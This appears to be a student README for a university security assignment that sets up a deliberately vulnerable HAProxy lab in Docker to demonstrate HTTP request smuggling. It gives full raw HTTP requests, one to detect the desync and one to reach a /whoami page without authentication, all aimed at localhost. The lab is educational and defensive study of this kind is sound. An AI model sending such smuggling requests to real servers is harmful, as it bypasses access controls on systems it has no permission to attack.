= ISEC3004 assignment


= To run the program:
In current directory please run in terminal:
docker-compose up


= if you try to recompile the code than please run:
docker-compose up --build 


= to remove everything, eg stoped docker container or images please run:
docker system prune


= To run test 
go to test directory run:
./chech.sh
Note: this only check whether server is running

= Run testing in burp suite
We don't have any functinality in our website we only set up the servers that shows the vulnerability to http desync, so currently we only have the blank webpage. we tried to put something in our webpage, but it doesn't work the way we wanted to, so we left the webpage blank and testing out our server using following code through burp suite...

= To detect vulnerability
you can also try this code to detect whether server is vulnerable to http desync, which will return error code 500 Internal server error, which means the request is been processed at the back end, hence, vulnerable to http desync.

POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 37
Connection: keep-alive
Transfer-Encoding:	chunked

1
A
0

GET / HTTP/1.1
X-Foo: bar

= To exploit vulnerability
copy following request into burp suite repeater(you will need to set the host to 127.0.0.1 and port to 9013). this will allow request to pass to backend get the information for whoami webpages, this means that we have access to /whoani page without authenticating.

POST / HTTP/1.1
Host: localhost
Transfer-Encoding:	chunked
Connection:keep-alive
Content-Length: 3

0

GET /whoami HTTP/1.1
Host:localhost
Content-Length: 1

0


= Additional information:
we patched our program by updating HAProxy server version to 2.0.6 and set http-reuse never in branch "patch 2", this suppose to fix the http request smuggling according to this documents:
https://git.haproxy.org/?p=haproxy-2.0.git;a=commit;h=196a7df44d8129d1adc795da020b722614d6a581
Unfortunatly, this could not fix the issue and we have also tried many other version HAProxy as well.





= Reference:
HAProxy HTTP request smuggling:
https://nathandavison.com/blog/haproxy-http-request-smuggling
HTTP-Smuggling-Lab:
https://github.com/ZeddYu/HTTP-Smuggling-Lab/tree/master/lab3